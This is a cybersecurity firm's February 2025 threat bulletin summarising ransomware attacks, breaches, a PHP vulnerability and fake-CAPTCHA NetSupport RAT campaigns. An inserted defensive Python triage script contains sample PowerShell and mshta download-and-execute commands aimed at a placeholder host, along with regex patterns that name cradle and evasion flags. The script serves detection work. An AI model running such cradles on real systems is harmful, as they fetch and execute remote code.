DigitalXRAID

Threat Pulse – February 2025

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats. 

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available. 

Lee Enterprises Cyberattack  

The parent company of the Richmond Times-Dispatch suffered a cyberattack attributed to the Russian-linked Qilin group. The incident disrupted operations across multiple newspapers, leading to reduced editions and missing features for about a month. 

Exploitation of PHP Vulnerability  

Attackers actively exploited a critical remote code execution vulnerability (CVE-2024-4577) in PHP, patched in June 2024. This flaw affected Windows servers using Apache and PHP-CGI, highlighting the risks of unpatched systems. 

Genea Fertility Clinic Data Breach  

On February 26, 2025, Genea, an Australian IVF and fertility services provider, confirmed a data breach involving the Termite ransomware group. The breach exposed approximately 940.7GB of sensitive patient data, including personal details such as names, contact information, Medicare numbers, medical histories, and test results.

Financial data were reportedly not compromised. Genea has obtained a court injunction to prevent further dissemination of the stolen information and is collaborating with cybersecurity authorities to address the incident. 

Insider Risk Concerns in U.S. Government  

The Department of Government Efficiency (DOGE) faced scrutiny over potential insider threats due to rapid onboarding processes. Experts warned that the department’s structure could lead to significant security gaps. 

Ransomware Attack on HCRG Care Group  

HCRG Care Group, a UK-based provider of health and social care services, fell victim to a ransomware attack by the cybercrime group Medusa. The attack led to unauthorised access to sensitive patient data, though specific details regarding the compromised information have not been publicly disclosed. The incident highlights the ongoing threat of ransomware attacks targeting healthcare organisations. 

IoT Data Breach Exposing Billions of Records  

A significant data breach involving Internet of Things (IoT) devices exposed approximately 2.7 billion records. The breach raised concerns about the security of IoT devices and the vast amounts of data they generate. 

8Base Ransomware Gang Disruption  

Law enforcement agencies arrested four individuals connected to the 8Base ransomware gang and seized 27 of their servers. The group targeted organisations in the U.S. and Brazil, employing a double-extortion model. 

AI Platform Breaches and Data Misuse Concerns  

February saw breaches involving AI platforms, raising concerns about data misuse and security vulnerabilities. These incidents highlighted the need for robust cybersecurity measures in emerging technologies. 

Remote Access Trojans (RATs)

The distribution of Remote Access Trojans, such as NetSupport RAT, was prevalent in February 2025. Attackers injected fake CAPTCHA pages into compromised websites, prompting users to execute malicious PowerShell commands that downloaded and executed the NetSupport RAT, granting attackers remote control over infected systems. 
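The fake-CAPTCHA chain above ends with a user pasting a PowerShell download cradle into a Run box, which leaves a recognisable process-creation footprint. The following added example (not from the original bulletin, and not DigitalXRAID's own tooling) triages constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688 records; the event fields, sample command lines and placeholder host names are assumptions for illustration.

```python
import re

# Constructed sample process-creation events (not real telemetry), shaped like the
# fields a Sysmon Event ID 1 or Windows 4688 record carries. Host names are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://placeholder.invalid/verify | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://placeholder.invalid/captcha"},
    {"parent": r"C:\Program Files\BuildTool\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\deploy.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad"},
]

# Interpreters a pasted Run-box command typically lands in.
SCRIPT_HOSTS = re.compile(r"\\(powershell|pwsh|mshta|cmd|wscript|cscript)\.exe$", re.I)
# Download-and-execute cradles and the remote URLs they fetch from.
CRADLE = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|"
                    r"start-bitstransfer|\biex\b|invoke-expression|curl|wget|\bhttps?://)", re.I)
# Flags that hide the console window or relax execution policy.
EVASION = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-ep\s+bypass|-nop\b)", re.I)

def score_event(ev):
    """Return (severity, reasons) for one process-creation event."""
    reasons = []
    if not SCRIPT_HOSTS.search(ev["image"]):
        return "none", reasons
    # explorer.exe as parent is what the Win+R dialog produces: a user typed or pasted it.
    if ev["parent"].lower().endswith(r"\explorer.exe"):
        reasons.append("script host launched from explorer.exe (user-initiated)")
    if CRADLE.search(ev["cmdline"]):
        reasons.append("download-and-execute cradle in command line")
    if EVASION.search(ev["cmdline"]):
        reasons.append("hidden-window / policy-bypass flags")
    if len(reasons) >= 2:
        return "high", reasons
    return ("medium" if reasons else "none"), reasons

def triage(events):
    """Return only the events worth an analyst's attention, with their reasons."""
    out = []
    for ev in events:
        severity, reasons = score_event(ev)
        if severity != "none":
            out.append({"severity": severity, "cmdline": ev["cmdline"], "reasons": reasons})
    return out

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["cmdline"], "|", "; ".join(hit["reasons"]))
```

The scheduled deployment script in the third event is deliberately left unflagged: its parent is not explorer.exe and its command line carries neither a cradle nor evasion flags, which is the distinction that keeps this logic from paging on routine administration.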

Meta Confirms WhatsApp Spyware Hack

Facebook owner Meta confirmed that a hacking attack impacted users of the WhatsApp secure messaging platform. As first reported by The Guardian, WhatsApp users were targeted by a sophisticated spyware attack, affecting a number of users including journalists and members of civil society. 

DragonForce Ransomware Attack on Saudi Real Estate Firm

On February 14, 2025, the DragonForce ransomware group targeted a prominent real estate and construction company in Riyadh, Saudi Arabia. The attackers exfiltrated approximately 6 terabytes of data, including sensitive project details and financial records. They set a ransom deadline just one day before the start of Ramadan, leveraging cultural and religious events to pressure the victim into paying the ransom. 

IMI Engineering Group Cyberattack

IMI, a UK-based engineering company, detected unauthorised access to its systems in mid-February 2025. The company engaged external cybersecurity experts to investigate the breach, news of which led to a 1.2% drop in its share price. This incident followed a similar attack on its competitor, Smiths Group, earlier in the year.

Lazarus Group’s Suspected Involvement in Major Crypto Exchange Hack  

In February 2025, the Dubai-based cryptocurrency exchange Bybit suffered a hack resulting in the loss of 400,000 Ethereum, valued at approximately $1.5 billion. Industry analysts suspect the North Korea-linked Lazarus Group was responsible for this breach, marking one of the largest cryptocurrency exchange hacks to date. 

ENGlobal Cybersecurity Breach 

ENGlobal, an energy sector contractor, experienced a cybersecurity breach that drew attention to the sector’s vulnerabilities. The attack highlighted the energy industry’s susceptibility due to its legacy infrastructure, making it a prime target for cyber adversaries seeking to exploit potential weaknesses. 

Modat Researchers Uncover AMS Vulnerabilities 

In early 2025, Modat researchers conducted a comprehensive investigation, uncovering widespread internet exposure of Automated Manifest System (AMS) installations. This exposure revealed significant security vulnerabilities impacting organisations globally, including those in the construction sector. The flaws posed serious risks to data integrity and physical security, highlighting the urgent need for improved safeguards and stricter oversight. The vulnerabilities led to the exposure of hundreds of thousands of highly sensitive employee records, including personal identification details, biometric information, photographs, and work schedules. 

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service mean we can take care of your security, whilst you take care of business.

Talk to the team to see how you can start protecting your business against cyberattacks today. 

Protect Your Business & Your Reputation.

With a continued focus on security, you can rest assured that breaches and exploits won't be holding you back.
